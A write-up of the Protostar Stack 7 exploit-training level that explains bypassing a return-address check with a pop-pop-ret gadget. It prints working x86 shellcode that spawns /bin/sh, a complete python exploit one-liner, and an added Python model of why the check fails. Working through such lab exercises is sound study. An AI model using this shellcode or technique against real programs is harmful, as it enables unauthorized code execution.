Exploit Exercises - Protostar Stack 7

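In this level, the program checks that the return address does not start with 0xb (0xbxxxxxxx). So I return to a pop; pop; ret gadget first, which takes the next return address from the stack and jumps to it.
Found pop pop ret at: 0x08048492
The payload layout:
| "A" * 80 | pop pop ret address | 8 bytes junk | NOP sled address | NOP sled (to tolerate address shifting) | Shellcode |
This is the shellcode: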
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load the PoC into gdb, set a breakpoint, and debug. I found that the NOP sled starts at 0xbffff698. Now build the PoC:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7
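Why the check does not stop this layout, as an added example that is not part of the original post: it models the check on each control transfer in the payload and shows that only the saved return address is ever inspected. The mask value and the function names are assumptions based on the post's description, and the shellcode is replaced by a placeholder.

```python
import struct

# Values taken from the post; the mask is an assumption that models
# "return address must not start with 0xb".
OFFSET = 80                 # padding before the saved return address
GADGET = 0x08048492         # pop; pop; ret
SLED_ADDR = 0xbffff698      # NOP sled address found in gdb
MASK = 0xb0000000           # assumed form of the program's check


def check_rejects(addr):
    """Model of the level's check: True means the program would exit."""
    return (addr & MASK) == MASK


def trace_hops(payload, offset=OFFSET, pops=2):
    """Follow the control transfers the payload layout implies.

    Returns a list of (description, address, checked, rejected).
    Only the first hop is the saved return address, so only it is
    seen by the check; the gadget's own `ret` is not.
    """
    first, = struct.unpack_from("<I", payload, offset)
    # The gadget pops `pops` 4-byte words, then `ret` reads the next word.
    second_off = offset + 4 + 4 * pops
    second, = struct.unpack_from("<I", payload, second_off)
    return [
        ("saved return address", first, True, check_rejects(first)),
        ("gadget ret target", second, False, check_rejects(second)),
    ]


def build_sample():
    """Constructed sample with the post's layout; shellcode is a placeholder."""
    return (b"A" * OFFSET + struct.pack("<I", GADGET) + b"C" * 8
            + struct.pack("<I", SLED_ADDR) + b"\x90" * 40 + b"\xcc" * 4)


if __name__ == "__main__":
    for name, addr, checked, rejected in trace_hops(build_sample()):
        print(f"{name:22} 0x{addr:08x} checked={checked} would_reject={rejected}")
```

The second row is the address the check would have rejected, but it is reached through the gadget's `ret` and never passes through the check.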

